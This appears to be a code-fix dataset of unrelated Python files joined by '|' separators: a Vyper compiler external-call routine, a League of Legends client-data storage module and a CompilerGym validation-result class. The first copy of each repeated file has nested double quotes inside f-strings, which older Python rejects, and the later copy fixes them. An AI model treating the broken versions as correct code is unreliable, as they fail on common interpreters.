contract_name,
contract_address,
pos,
value=None,
gas=None):
from vyper.parser.expr import (
Expr,
)
if value is None:
value = 0
if gas is None:
gas = 'gas'
if not contract_name:
raise StructureException(
f'Invalid external contract call "{node.func.attr}".',
node
)
if contract_name not in context.sigs:
raise VariableDeclarationException(
f'Contract "{contract_name}" not declared yet',
node
)
if contract_address.value == "address":
raise StructureException(
f"External calls to self are not permitted.", node
)
method_name = node.func.attr
if method_name not in context.sigs[contract_name]:
raise FunctionDeclarationException(
(
f"Function not declared yet: {method_name} (reminder: "
"function must be declared in the correct contract)"
f"The available methods are: {','.join(context.sigs[contract_name].keys())}"
),
node.func
)
sig = context.sigs[contract_name][method_name]
inargs, inargsize, _ = pack_arguments(
sig,
[Expr(arg, context).lll_node for arg in node.args],
context,
node.func,
)
output_placeholder, output_size, returner = get_external_contract_call_output(sig, context)
sub = [
'seq',
['assert', ['extcodesize', contract_address]],
['assert', ['ne', 'address', contract_address]],
]
if context.is_constant() and not sig.const:
raise ConstancyViolation(
f"May not call non-constant function '{method_name}' within {context.pp_constancy()}."
" For asserting the result of modifiable contract calls, try assert_modifiable.",
node
)
if context.is_constant() or sig.const:
sub.append([
'assert',
[
'staticcall',
gas, contract_address, inargs, inargsize, output_placeholder, output_size,
]
])
else:
sub.append([
'assert',
[
'call',
gas, contract_address, value, inargs, inargsize, output_placeholder, output_size,
]
])
sub.extend(returner)
o = LLLnode.from_list(sub, typ=sig.output_type, location='memory', pos=getpos(node))
return o
def get_external_contract_call_output(sig, context):
if not sig.output_type:
return 0, 0, []
output_placeholder = context.new_placeholder(typ=sig.output_type)
output_size = get_size_of_type(sig.output_type) * 32
if isinstance(sig.output_type, BaseType):
returner = [0, output_placeholder]
elif isinstance(sig.output_type, ByteArrayLike):
returner = [0, output_placeholder + 32]
elif isinstance(sig.output_type, TupleLike):
returner = [0, output_placeholder]
elif isinstance(sig.output_type, ListType):
returner = [0, output_placeholder]
else:
raise TypeMismatch(f"Invalid output type: {sig.output_type}")
return output_placeholder, output_size, returner
def get_external_contract_keywords(stmt_expr, context):
from vyper.parser.expr import Expr
value, gas = None, None
for kw in stmt_expr.keywords:
if kw.arg not in ('value', 'gas'):
raise TypeMismatch(
'Invalid keyword argument, only "gas" and "value" supported.',
stmt_expr,
)
elif kw.arg == 'gas':
gas = Expr.parse_value_expr(kw.value, context)
elif kw.arg == 'value':
value = Expr.parse_value_expr(kw.value, context)
return value, gas
def make_external_call(stmt_expr, context):
from vyper.parser.expr import Expr
value, gas = get_external_contract_keywords(stmt_expr, context)
if (
isinstance(stmt_expr.func, vy_ast.Attribute) and
isinstance(stmt_expr.func.value, vy_ast.Call)
):
contract_name = stmt_expr.func.value.func.id
contract_address = Expr.parse_value_expr(stmt_expr.func.value.args[0], context)
return external_contract_call(
stmt_expr,
context,
contract_name,
contract_address,
pos=getpos(stmt_expr),
value=value,
gas=gas,
)
elif isinstance(stmt_expr.func.value, vy_ast.Attribute) and stmt_expr.func.value.attr in context.sigs: # noqa: E501
contract_name = stmt_expr.func.value.attr
var = context.globals[stmt_expr.func.value.attr]
contract_address = unwrap_location(LLLnode.from_list(
var.pos,
typ=var.typ,
location='storage',
pos=getpos(stmt_expr),
annotation='self.' + stmt_expr.func.value.attr,
))
return external_contract_call(
stmt_expr,
context,
contract_name,
contract_address,
pos=getpos(stmt_expr),
value=value,
gas=gas,
)
elif (
isinstance(stmt_expr.func.value, vy_ast.Attribute) and
stmt_expr.func.value.attr in context.globals
and hasattr(context.globals[stmt_expr.func.value.attr].typ, 'name')
):
contract_name = context.globals[stmt_expr.func.value.attr].typ.name
var = context.globals[stmt_expr.func.value.attr]
contract_address = unwrap_location(LLLnode.from_list(
var.pos,
typ=var.typ,
location='storage',
pos=getpos(stmt_expr),
annotation='self.' + stmt_expr.func.value.attr,
))
return external_contract_call(
stmt_expr,
context,
contract_name,
contract_address,
pos=getpos(stmt_expr),
value=value,
gas=gas,
)
else:
raise StructureException("Unsupported operator.", stmt_expr)
|
import os
import re
import itertools
import json
import glob
from contextlib import contextmanager
from typing import List, Tuple, Union, Optional, Generator, Iterable
import logging
import requests
import hachoir.parser
import hachoir.metadata
from .tools import write_file_or_remove
logger = logging.getLogger(__name__)
class BaseVersion:
"""Base wrapper class for version strings
Version instances are comparable and hashable.
"""
def __init__(self, v: Union[str, tuple]):
if isinstance(v, str):
self.s = v
self.t = tuple(int(x) for x in v.split('.'))
elif isinstance(v, tuple):
self.s = '.'.join(str(x) for x in v)
self.t = v
else:
raise TypeError(v)
def __repr__(self):
return f"{self.__class__.__qualname__}({self.s!r})"
def __str__(self):
return self.s
def __lt__(self, other):
return self.t < other.t
def __le__(self, other):
return self.t <= other.t
def __gt__(self, other):
return self.t > other.t
def __ge__(self, other):
return self.t >= other.t
def __eq__(self, other):
# allow to compare with any other version instance, string or tuple
if isinstance(other, BaseVersion):
return self.s == other.s
elif isinstance(other, str):
return self.s == other
elif isinstance(other, tuple):
return self.t == other
else:
return False
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash(self.s)
class PatchVersion(BaseVersion):
"""Wrapper class for patch version numbers
Patch versions are X.Y, where X is the season and Y the patch number, starting at 1.
Mid-update patches (e.g. 8.23.2) are not handled.
For PBE, the special version `main` is used.
"""
def __init__(self, v: Union[str, tuple]):
if isinstance(v, str) and v == "main":
# make it comparable, but only with itself
self.s = self.t = v
else:
super().__init__(v)
# support more numbers but truncate to 2
if len(self.t) > 2:
self.t = self.t[:2]
self.s = '.'.join(str(x) for x in self.t)
assert len(self.t) == 2, "invalid patch version format"
class RequestStreamReader:
"""Wrapper for reading data from stream request"""
DOWNLOAD_CHUNK_SIZE = 10 * 1024**2
def __init__(self, r):
self.it = r.iter_content(self.DOWNLOAD_CHUNK_SIZE)
self.pos = 0
self.buf = b''
def copy(self, writer, n):
"""Read n bytes and write them using writer"""
self.pos += n
while n:
if n <= len(self.buf):
if writer:
writer(self.buf[:n])
self.buf = self.buf[n:]
return
if writer and self.buf:
writer(self.buf)
n -= len(self.buf)
self.buf = next(self.it)
def skip(self, n):
"""Skip n bytes"""
self.copy(None, n)
def skip_to(self, pos):
assert self.pos <= pos
self.skip(pos - self.pos)
# registered storage classes
_storage_registry = {}
def load_storage_conf(path):
with open(path) as f:
conf = json.load(f)
if 'type' not in conf:
raise ValueError("storage configuration file must define its 'type'")
conf['path'] = os.path.normpath(os.path.join(os.path.dirname(path), conf.get('path', '.')))
return conf
def storage_conf_from_path(path):
"""Parse a path as supported by Storage.from_path()
The returned conf is guaranteed to have a `type` and a `path` entries.
"""
if os.path.isdir(path):
conf_path = os.path.join(path, 'cdtb.storage.conf')
if os.path.isfile(conf_path):
return load_storage_conf(conf_path)
else:
conf = guess_storage_conf(path)
if conf is None:
raise ValueError(f"cannot guess storage configuration from '{path}'")
return conf
elif os.path.isfile(path):
return load_storage_conf(path)
elif ':' in path:
storage_type, storage_path = path.split(':', 1)
return {'type': storage_type, 'path': storage_path}
else:
raise ValueError(f"invalid storage path: {path}")
def guess_storage_conf(path):
"""Try to guess storage configuration from path"""
if os.path.isdir(os.path.join(path, 'solutions')):
# don't accept game installation directories
if glob.glob(os.path.join(path, 'solutions/lol_game_client_sln/releases/releases_*')):
return None
conf = {'type': 'rads', 'path': path}
basename = os.path.basename(path)
if basename in ('RADS.pbe', 'RADS.kr'):
conf['cdn'] = basename.split('.')[-1]
return conf
elif os.path.isdir(os.path.join(path, 'channels')):
return {'type': 'patcher', 'path': path}
return None
class StorageRegister(type):
"""Metaclass to register storage types"""
def __new__(mcs, name, bases, class_dict):
cls = type.__new__(mcs, name, bases, class_dict)
if cls.storage_type is not None:
_storage_registry[cls.storage_type] = cls
return cls
class Storage(metaclass=StorageRegister):
"""
Download and store game and client files
Each storage is basically a directory in which files are downloaded and
extracted if needed. Each storage type can define configuration options.
"""
storage_type = None
def __init__(self, path, url):
self.path = path
self.url = url
self.s = requests.session()
@staticmethod
def from_path(path):
"""Return a storage from a path
`path` can points to:
- a storage configuration file
- a directory containing a `cdtb.storage.conf` file
- a directory (storage configuration will be guessed, if possible)
- `type:dir_path` string
"""
conf = storage_conf_from_path(path)
if conf is None:
raise ValueError(f"cannot retrieve storage configuration from '{path}'")
return Storage.from_conf(conf)
@staticmethod
def from_conf(conf):
try:
cls = _storage_registry[conf['type']]
except KeyError:
raise ValueError(f"unknown storage type: {conf["type"]}")
return cls.from_conf_data(conf)
@classmethod
def from_conf_data(cls, conf):
raise NotImplementedError()
def request_get(self, path, **kwargs) -> requests.Response:
"""Request a path, returns a requests.Response object"""
return self.s.get(self.url + path, **kwargs)
def request_text(self, path) -> str:
"""Request a path, return content as text"""
r = self.request_get(path)
r.raise_for_status()
r.encoding = 'utf-8'
return r.text
def fspath(self, path) -> str:
"""Return full path from a storage-relative path"""
return os.path.join(self.path, path)
def download(self, urlpath, path, force=False) -> None:
"""Download a path to disk
If path is None, use urlpath's value.
"""
if path is None:
path = urlpath
fspath = self.fspath(path)
if not force and os.path.isfile(fspath):
return
logger.debug(f"download file: {path}")
r = self.request_get(urlpath)
r.raise_for_status()
with write_file_or_remove(fspath) as f:
f.write(r.content)
@contextmanager
def stream(self, urlpath) -> RequestStreamReader:
"""Request a path for streaming download"""
with self.s.get(self.url + urlpath, stream=True) as r:
r.raise_for_status()
yield RequestStreamReader(r)
def patch_elements(self, stored=False) -> Generator['PatchElement', None, None]:
"""Generate patch elements, sorted from the latest one
If stored is True, only elements already in storage are used (to avoid
downloading new files).
Versions are generated so the caller can stop iterating when needed
versions have been retrieved, avoiding to fetch all solutions.
Note: patch versions are assumed to be monotonous in successive
solution versions (they never decrease).
For PBE, patch version is always 'main'.
"""
raise NotImplementedError()
def patch_element(self, name, version=None, stored=False) -> Optional['PatchElement']:
"""Retrieve a single patch element, None if not found
If version if None, retrieve the latest one with given name.
"""
for e in self.patch_elements(stored=stored):
if e.name != name:
continue
if version is None or e.version == version:
return e
return None
def patches(self, stored=False) -> Generator['Patch', None, None]:
"""Generate patch, sorted from the latest one
See patch_elements() for additional remarks.
"""
for _, group in itertools.groupby(self.patch_elements(stored=stored), key=lambda e: e.version):
# keep latest sub-patch version of each element
elements = {}
for elem in group:
if elem.name not in elements:
elements[elem.name] = elem
yield Patch._create(list(elements.values()))
def patch(self, version=None, stored=False) -> Optional['Patch']:
"""Retrieve a single patch, None if not found
If version if None, retrieve the latest one.
"""
it = self.patches(stored=stored)
if version is None:
return next(it)
for p in it:
if p.version == version:
return p
return None
class PatchElement:
"""
Element of a patch (game or client)
This base class must not be instantiated directly.
In methods parameters, `langs` is used to filter language-specific files
and can have the following values:
False -- language-independent
True -- all languages
lang -- single given language
[lang, ...] -- list of given languages
"""
# valid names
names = ('game', 'client')
def __init__(self, name, version: PatchVersion):
self.name = name
assert name in self.names
self.version = version
def __repr__(self):
return f"<{self.__class__.__qualname__} {self.name} {self.version}>"
def __eq__(self, other):
if isinstance(other, PatchElement):
return self.name == other.name and self.version == other.version
return False
def __hash__(self):
return hash((self.name, self.version))
def download(self, langs=True):
"""Download files of this patch element to the storage"""
raise NotImplementedError()
def fspaths(self, langs=True) -> Generator[str, None, None]:
"""Generate the path on disk of files in the element"""
raise NotImplementedError()
def relpaths(self, langs=True) -> Generator[str, None, None]:
"""Generate the relative (export) path of files in the element, normalized"""
raise NotImplementedError()
def paths(self, langs=True) -> Generator[Tuple[str, str], None, None]:
"""Equivalent zip(fspaths(), relpaths())"""
return zip(self.fspaths(langs=langs), self.relpaths(langs=langs))
class Patch:
"""
A single League patch version (e.g. patch 8.1)
This class cannot not be instantiated directly.
Use patch() or patches() methods on Storage instances.
"""
def __init__(self):
raise RuntimeError("This class should not be instantiated by the user.")
@classmethod
def _create(cls, elements: List[PatchElement]):
"""Create a patch from its elements"""
self = cls.__new__(cls)
versions = {elem.version for elem in elements}
if len(versions) != 1:
raise ValueError("versions of patch elements mismatch")
self.version = versions.pop()
self.elements = elements
return self
def __str__(self):
return f"patch={self.version}"
def __repr__(self):
return f"<{self.__class__.__qualname__} {self.version}>"
def __eq__(self, other):
if isinstance(other, Patch):
return self.version == other.version
return False
def __hash__(self):
return hash(self.version)
def __lt__(self, other):
if isinstance(other, Patch):
return self.version > other.version
return NotImplemented
def latest(self):
"""Return a new patch with only latest version of each element name"""
elements = []
for _, group in itertools.groupby(self.elements, key=lambda e: e.name):
elements.append(max(group, key=lambda e: e.version))
return self._create(elements)
def download(self, langs=True):
for elem in self.elements:
elem.download(langs=langs)
def get_system_yaml_version(path) -> str:
with open(path) as f:
for line in f:
# TODO do proper yaml parsing
# formats: Release/X.Y or 'X.Y'
m = re.match(r"""^ *(?:game-|)branch: .*["'/]([0-9.]+)["']?$""", line)
if m:
return m.group(1)
else:
return None
def get_exe_version(path) -> str:
"""Return version from an executable"""
parser = hachoir.parser.createParser(path)
metadata = hachoir.metadata.extractMetadata(parser=parser)
return metadata.get('version')
def get_content_metadata_version(path) -> str:
"""Return branch version from content-metadata.json file"""
with open(path) as f:
data = json.load(f)
m = re.match(r"^(\d+\.\d+)\.", data['version'])
if m:
return m.group(1)
return None
def parse_storage_component(storage: Storage, component: str) -> Union[None, Patch, PatchElement]:
"""Parse a component string representation to patch elements"""
m = re.match(fr'^(patch|{"|".join(PatchElement.names)})=(|[0-9]+(?:\.[0-9]+\.?)*|main)$', component)
if not m:
raise ValueError(f"invalid component: {component}")
name, version = m.group(1, 2)
if version == '':
version, latest = None, True
elif version.endswith('.'):
version, latest = version.rstrip('.'), True
else:
latest = False
if name == 'patch':
patch = storage.patch(version)
if patch is None:
return None
if latest:
patch = patch.latest()
return patch
else:
return storage.patch_element(name, version, stored=version is not None)
| import os
import re
import itertools
import json
import glob
from contextlib import contextmanager
from typing import List, Tuple, Union, Optional, Generator, Iterable
import logging
import requests
import hachoir.parser
import hachoir.metadata
from .tools import write_file_or_remove
logger = logging.getLogger(__name__)
class BaseVersion:
"""Base wrapper class for version strings
Version instances are comparable and hashable.
"""
def __init__(self, v: Union[str, tuple]):
if isinstance(v, str):
self.s = v
self.t = tuple(int(x) for x in v.split('.'))
elif isinstance(v, tuple):
self.s = '.'.join(str(x) for x in v)
self.t = v
else:
raise TypeError(v)
def __repr__(self):
return f"{self.__class__.__qualname__}({self.s!r})"
def __str__(self):
return self.s
def __lt__(self, other):
return self.t < other.t
def __le__(self, other):
return self.t <= other.t
def __gt__(self, other):
return self.t > other.t
def __ge__(self, other):
return self.t >= other.t
def __eq__(self, other):
# allow to compare with any other version instance, string or tuple
if isinstance(other, BaseVersion):
return self.s == other.s
elif isinstance(other, str):
return self.s == other
elif isinstance(other, tuple):
return self.t == other
else:
return False
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash(self.s)
class PatchVersion(BaseVersion):
"""Wrapper class for patch version numbers
Patch versions are X.Y, where X is the season and Y the patch number, starting at 1.
Mid-update patches (e.g. 8.23.2) are not handled.
For PBE, the special version `main` is used.
"""
def __init__(self, v: Union[str, tuple]):
if isinstance(v, str) and v == "main":
# make it comparable, but only with itself
self.s = self.t = v
else:
super().__init__(v)
# support more numbers but truncate to 2
if len(self.t) > 2:
self.t = self.t[:2]
self.s = '.'.join(str(x) for x in self.t)
assert len(self.t) == 2, "invalid patch version format"
class RequestStreamReader:
"""Wrapper for reading data from stream request"""
DOWNLOAD_CHUNK_SIZE = 10 * 1024**2
def __init__(self, r):
self.it = r.iter_content(self.DOWNLOAD_CHUNK_SIZE)
self.pos = 0
self.buf = b''
def copy(self, writer, n):
"""Read n bytes and write them using writer"""
self.pos += n
while n:
if n <= len(self.buf):
if writer:
writer(self.buf[:n])
self.buf = self.buf[n:]
return
if writer and self.buf:
writer(self.buf)
n -= len(self.buf)
self.buf = next(self.it)
def skip(self, n):
"""Skip n bytes"""
self.copy(None, n)
def skip_to(self, pos):
assert self.pos <= pos
self.skip(pos - self.pos)
# registered storage classes
_storage_registry = {}
def load_storage_conf(path):
with open(path) as f:
conf = json.load(f)
if 'type' not in conf:
raise ValueError("storage configuration file must define its 'type'")
conf['path'] = os.path.normpath(os.path.join(os.path.dirname(path), conf.get('path', '.')))
return conf
def storage_conf_from_path(path):
"""Parse a path as supported by Storage.from_path()
The returned conf is guaranteed to have a `type` and a `path` entries.
"""
if os.path.isdir(path):
conf_path = os.path.join(path, 'cdtb.storage.conf')
if os.path.isfile(conf_path):
return load_storage_conf(conf_path)
else:
conf = guess_storage_conf(path)
if conf is None:
raise ValueError(f"cannot guess storage configuration from '{path}'")
return conf
elif os.path.isfile(path):
return load_storage_conf(path)
elif ':' in path:
storage_type, storage_path = path.split(':', 1)
return {'type': storage_type, 'path': storage_path}
else:
raise ValueError(f"invalid storage path: {path}")
def guess_storage_conf(path):
"""Try to guess storage configuration from path"""
if os.path.isdir(os.path.join(path, 'solutions')):
# don't accept game installation directories
if glob.glob(os.path.join(path, 'solutions/lol_game_client_sln/releases/releases_*')):
return None
conf = {'type': 'rads', 'path': path}
basename = os.path.basename(path)
if basename in ('RADS.pbe', 'RADS.kr'):
conf['cdn'] = basename.split('.')[-1]
return conf
elif os.path.isdir(os.path.join(path, 'channels')):
return {'type': 'patcher', 'path': path}
return None
class StorageRegister(type):
"""Metaclass to register storage types"""
def __new__(mcs, name, bases, class_dict):
cls = type.__new__(mcs, name, bases, class_dict)
if cls.storage_type is not None:
_storage_registry[cls.storage_type] = cls
return cls
class Storage(metaclass=StorageRegister):
"""
Download and store game and client files
Each storage is basically a directory in which files are downloaded and
extracted if needed. Each storage type can define configuration options.
"""
storage_type = None
def __init__(self, path, url):
self.path = path
self.url = url
self.s = requests.session()
@staticmethod
def from_path(path):
"""Return a storage from a path
`path` can points to:
- a storage configuration file
- a directory containing a `cdtb.storage.conf` file
- a directory (storage configuration will be guessed, if possible)
- `type:dir_path` string
"""
conf = storage_conf_from_path(path)
if conf is None:
raise ValueError(f"cannot retrieve storage configuration from '{path}'")
return Storage.from_conf(conf)
@staticmethod
def from_conf(conf):
try:
cls = _storage_registry[conf['type']]
except KeyError:
raise ValueError(f"unknown storage type: {conf['type']}")
return cls.from_conf_data(conf)
@classmethod
def from_conf_data(cls, conf):
raise NotImplementedError()
def request_get(self, path, **kwargs) -> requests.Response:
"""Request a path, returns a requests.Response object"""
return self.s.get(self.url + path, **kwargs)
def request_text(self, path) -> str:
"""Request a path, return content as text"""
r = self.request_get(path)
r.raise_for_status()
r.encoding = 'utf-8'
return r.text
def fspath(self, path) -> str:
"""Return full path from a storage-relative path"""
return os.path.join(self.path, path)
def download(self, urlpath, path, force=False) -> None:
"""Download a path to disk
If path is None, use urlpath's value.
"""
if path is None:
path = urlpath
fspath = self.fspath(path)
if not force and os.path.isfile(fspath):
return
logger.debug(f"download file: {path}")
r = self.request_get(urlpath)
r.raise_for_status()
with write_file_or_remove(fspath) as f:
f.write(r.content)
@contextmanager
def stream(self, urlpath) -> RequestStreamReader:
"""Request a path for streaming download"""
with self.s.get(self.url + urlpath, stream=True) as r:
r.raise_for_status()
yield RequestStreamReader(r)
def patch_elements(self, stored=False) -> Generator['PatchElement', None, None]:
"""Generate patch elements, sorted from the latest one
If stored is True, only elements already in storage are used (to avoid
downloading new files).
Versions are generated so the caller can stop iterating when needed
versions have been retrieved, avoiding to fetch all solutions.
Note: patch versions are assumed to be monotonous in successive
solution versions (they never decrease).
For PBE, patch version is always 'main'.
"""
raise NotImplementedError()
def patch_element(self, name, version=None, stored=False) -> Optional['PatchElement']:
"""Retrieve a single patch element, None if not found
If version if None, retrieve the latest one with given name.
"""
for e in self.patch_elements(stored=stored):
if e.name != name:
continue
if version is None or e.version == version:
return e
return None
def patches(self, stored=False) -> Generator['Patch', None, None]:
"""Generate patch, sorted from the latest one
See patch_elements() for additional remarks.
"""
for _, group in itertools.groupby(self.patch_elements(stored=stored), key=lambda e: e.version):
# keep latest sub-patch version of each element
elements = {}
for elem in group:
if elem.name not in elements:
elements[elem.name] = elem
yield Patch._create(list(elements.values()))
def patch(self, version=None, stored=False) -> Optional['Patch']:
"""Retrieve a single patch, None if not found
If version if None, retrieve the latest one.
"""
it = self.patches(stored=stored)
if version is None:
return next(it)
for p in it:
if p.version == version:
return p
return None
class PatchElement:
"""
Element of a patch (game or client)
This base class must not be instantiated directly.
In methods parameters, `langs` is used to filter language-specific files
and can have the following values:
False -- language-independent
True -- all languages
lang -- single given language
[lang, ...] -- list of given languages
"""
# valid names
names = ('game', 'client')
def __init__(self, name, version: PatchVersion):
self.name = name
assert name in self.names
self.version = version
def __repr__(self):
return f"<{self.__class__.__qualname__} {self.name} {self.version}>"
def __eq__(self, other):
if isinstance(other, PatchElement):
return self.name == other.name and self.version == other.version
return False
def __hash__(self):
return hash((self.name, self.version))
def download(self, langs=True):
"""Download files of this patch element to the storage"""
raise NotImplementedError()
def fspaths(self, langs=True) -> Generator[str, None, None]:
"""Generate the path on disk of files in the element"""
raise NotImplementedError()
def relpaths(self, langs=True) -> Generator[str, None, None]:
"""Generate the relative (export) path of files in the element, normalized"""
raise NotImplementedError()
def paths(self, langs=True) -> Generator[Tuple[str, str], None, None]:
"""Equivalent zip(fspaths(), relpaths())"""
return zip(self.fspaths(langs=langs), self.relpaths(langs=langs))
class Patch:
"""
A single League patch version (e.g. patch 8.1)
This class cannot not be instantiated directly.
Use patch() or patches() methods on Storage instances.
"""
def __init__(self):
raise RuntimeError("This class should not be instantiated by the user.")
@classmethod
def _create(cls, elements: List[PatchElement]):
"""Create a patch from its elements"""
self = cls.__new__(cls)
versions = {elem.version for elem in elements}
if len(versions) != 1:
raise ValueError("versions of patch elements mismatch")
self.version = versions.pop()
self.elements = elements
return self
def __str__(self):
return f"patch={self.version}"
def __repr__(self):
return f"<{self.__class__.__qualname__} {self.version}>"
def __eq__(self, other):
if isinstance(other, Patch):
return self.version == other.version
return False
def __hash__(self):
return hash(self.version)
def __lt__(self, other):
if isinstance(other, Patch):
return self.version > other.version
return NotImplemented
def latest(self):
"""Return a new patch with only latest version of each element name"""
elements = []
for _, group in itertools.groupby(self.elements, key=lambda e: e.name):
elements.append(max(group, key=lambda e: e.version))
return self._create(elements)
def download(self, langs=True):
for elem in self.elements:
elem.download(langs=langs)
def get_system_yaml_version(path) -> str:
with open(path) as f:
for line in f:
# TODO do proper yaml parsing
# formats: Release/X.Y or 'X.Y'
m = re.match(r"""^ *(?:game-|)branch: .*["'/]([0-9.]+)["']?$""", line)
if m:
return m.group(1)
else:
return None
def get_exe_version(path) -> str:
"""Return version from an executable"""
parser = hachoir.parser.createParser(path)
metadata = hachoir.metadata.extractMetadata(parser=parser)
return metadata.get('version')
def get_content_metadata_version(path) -> str:
"""Return branch version from content-metadata.json file"""
with open(path) as f:
data = json.load(f)
m = re.match(r"^(\d+\.\d+)\.", data['version'])
if m:
return m.group(1)
return None
def parse_storage_component(storage: Storage, component: str) -> Union[None, Patch, PatchElement]:
"""Parse a component string representation to patch elements"""
m = re.match(fr'^(patch|{"|".join(PatchElement.names)})=(|[0-9]+(?:\.[0-9]+\.?)*|main)$', component)
if not m:
raise ValueError(f"invalid component: {component}")
name, version = m.group(1, 2)
if version == '':
version, latest = None, True
elif version.endswith('.'):
version, latest = version.rstrip('.'), True
else:
latest = False
if name == 'patch':
patch = storage.patch(version)
if patch is None:
return None
if latest:
patch = patch.latest()
return patch
else:
return storage.patch_element(name, version, stored=version is not None)
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""This module defines the validation result tuple."""
import itertools
import re
from collections import Counter
from typing import Iterable, List
from pydantic import BaseModel, validator
from compiler_gym.compiler_env_state import CompilerEnvState
from compiler_gym.util.shell_format import plural
from compiler_gym.util.truncate import truncate
from compiler_gym.validation_error import ValidationError
class ValidationResult(BaseModel):
"""A tuple that represents the result of validating a compiler environment state."""
state: CompilerEnvState
"""The compiler environment state that was validated."""
walltime: float
"""The wall time in seconds that the validation took."""
reward_validated: bool = False
"""Whether the reward that was recorded in the original state was validated."""
actions_replay_failed: bool = False
"""Whether the commandline was unable to be reproduced."""
reward_validation_failed: bool = False
"""Whether the validated reward differed from the original state."""
benchmark_semantics_validated: bool = False
"""Whether the semantics of the benchmark were validated."""
benchmark_semantics_validation_failed: bool = False
"""Whether the semantics of the benchmark were found to have changed."""
errors: List[ValidationError] = []
"""A list of :class:`ValidationError <compiler_gym.ValidationError>` """
@validator("walltime")
def walltime_nonnegative(cls, v):
assert v >= 0, "Walltime cannot be negative"
return v
def __eq__(self, rhs):
"""Equality comparison.
Validation results are *not* compared on walltime, and are insensitive
to the order of errors.
"""
if not isinstance(rhs, ValidationResult):
return False
return (
self.state == rhs.state
and self.reward_validated == rhs.reward_validated
and self.actions_replay_failed == rhs.actions_replay_failed
and self.reward_validation_failed == rhs.reward_validation_failed
and self.benchmark_semantics_validated == rhs.benchmark_semantics_validated
and self.benchmark_semantics_validation_failed
== rhs.benchmark_semantics_validation_failed
and sorted(self.errors) == sorted(rhs.errors)
)
def __ne__(self, rhs):
return not self == rhs
@property
def error_details(self) -> str:
"""A summary description of the validation errors."""
if not self.errors:
return ""
msg = []
error_types = [e.type for e in self.errors]
freq = sorted(Counter(error_types).items(), key=lambda x: -x[1])
# Shortcut for when there is just a single message to aggregate. Use
# format: "${error_msg}" if there is a single error or "${n}×
# ${error_msg}" if there are multiple copies of the same error.
if len(freq) == 1:
message = str(error_types[0])
if len(error_types) == 1:
return message
return f"{len(error_types)}× {message}"
# If there are multiple error messages, number them using the format:
# "[${i}/${j}] ${n}× ${error_msg}". E.g. "[1/3] 18× Memory leak".
for j, (message, count) in enumerate(freq, start=1):
if count > 1:
msg.append(f"[{j}/{len(freq)}] {count}× {message}")
else:
msg.append(f"[{j}/{len(freq)}] {message}")
remaining = len(freq) - j
if j >= 3 and remaining > 3:
msg.append(
f"... ({remaining} more {plural(remaining, "error", "errors")})"
)
break
return ", ".join(msg)
def okay(self) -> bool:
"""Whether validation succeeded."""
return not (
self.actions_replay_failed
or self.reward_validation_failed
or self.benchmark_semantics_validation_failed
)
def __repr__(self):
# Remove default-scheme prefix to improve output readability.
benchmark = re.sub(r"^benchmark://", "", str(self.state.benchmark))
if not self.okay():
msg = ", ".join(self.error_details.strip().split("\n"))
return f"❌ {benchmark} {truncate(msg, max_lines=1, max_line_len=50)}"
elif self.state.reward is None:
return f"✅ {benchmark}"
else:
return f"✅ {benchmark} {self.state.reward:.4f}"
def __str__(self):
return repr(self)
@classmethod
def join(cls, results: Iterable["ValidationResult"]):
"""Create a validation result that is the union join of multiple results."""
results = list(results)
if not results:
raise ValueError("No states to join")
if any(r.state != results[0].state for r in results[1:]):
raise ValueError("All states must be the same")
return cls(
# NOTE: No checking that states are the same.
state=results[0].state,
walltime=sum(r.walltime for r in results),
reward_validated=any(r.reward_validated for r in results),
actions_replay_failed=any(r.actions_replay_failed for r in results),
reward_validation_failed=any(r.reward_validation_failed for r in results),
benchmark_semantics_validated=any(
r.benchmark_semantics_validated for r in results
),
benchmark_semantics_validation_failed=any(
r.benchmark_semantics_validation_failed for r in results
),
errors=list(itertools.chain.from_iterable(r.errors for r in results)),
)
| # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""This module defines the validation result tuple."""
import itertools
import re
from collections import Counter
from typing import Iterable, List
from pydantic import BaseModel, validator
from compiler_gym.compiler_env_state import CompilerEnvState
from compiler_gym.util.shell_format import plural
from compiler_gym.util.truncate import truncate
from compiler_gym.validation_error import ValidationError
class ValidationResult(BaseModel):
"""A tuple that represents the result of validating a compiler environment state."""
state: CompilerEnvState
"""The compiler environment state that was validated."""
walltime: float
"""The wall time in seconds that the validation took."""
reward_validated: bool = False
"""Whether the reward that was recorded in the original state was validated."""
actions_replay_failed: bool = False
"""Whether the commandline was unable to be reproduced."""
reward_validation_failed: bool = False
"""Whether the validated reward differed from the original state."""
benchmark_semantics_validated: bool = False
"""Whether the semantics of the benchmark were validated."""
benchmark_semantics_validation_failed: bool = False
"""Whether the semantics of the benchmark were found to have changed."""
errors: List[ValidationError] = []
"""A list of :class:`ValidationError <compiler_gym.ValidationError>` """
@validator("walltime")
def walltime_nonnegative(cls, v):
assert v >= 0, "Walltime cannot be negative"
return v
def __eq__(self, rhs):
"""Equality comparison.
Validation results are *not* compared on walltime, and are insensitive
to the order of errors.
"""
if not isinstance(rhs, ValidationResult):
return False
return (
self.state == rhs.state
and self.reward_validated == rhs.reward_validated
and self.actions_replay_failed == rhs.actions_replay_failed
and self.reward_validation_failed == rhs.reward_validation_failed
and self.benchmark_semantics_validated == rhs.benchmark_semantics_validated
and self.benchmark_semantics_validation_failed
== rhs.benchmark_semantics_validation_failed
and sorted(self.errors) == sorted(rhs.errors)
)
def __ne__(self, rhs):
return not self == rhs
@property
def error_details(self) -> str:
"""A summary description of the validation errors."""
if not self.errors:
return ""
msg = []
error_types = [e.type for e in self.errors]
freq = sorted(Counter(error_types).items(), key=lambda x: -x[1])
# Shortcut for when there is just a single message to aggregate. Use
# format: "${error_msg}" if there is a single error or "${n}×
# ${error_msg}" if there are multiple copies of the same error.
if len(freq) == 1:
message = str(error_types[0])
if len(error_types) == 1:
return message
return f"{len(error_types)}× {message}"
# If there are multiple error messages, number them using the format:
# "[${i}/${j}] ${n}× ${error_msg}". E.g. "[1/3] 18× Memory leak".
for j, (message, count) in enumerate(freq, start=1):
if count > 1:
msg.append(f"[{j}/{len(freq)}] {count}× {message}")
else:
msg.append(f"[{j}/{len(freq)}] {message}")
remaining = len(freq) - j
if j >= 3 and remaining > 3:
msg.append(
f"... ({remaining} more {plural(remaining, 'error', 'errors')})"
)
break
return ", ".join(msg)
def okay(self) -> bool:
"""Whether validation succeeded."""
return not (
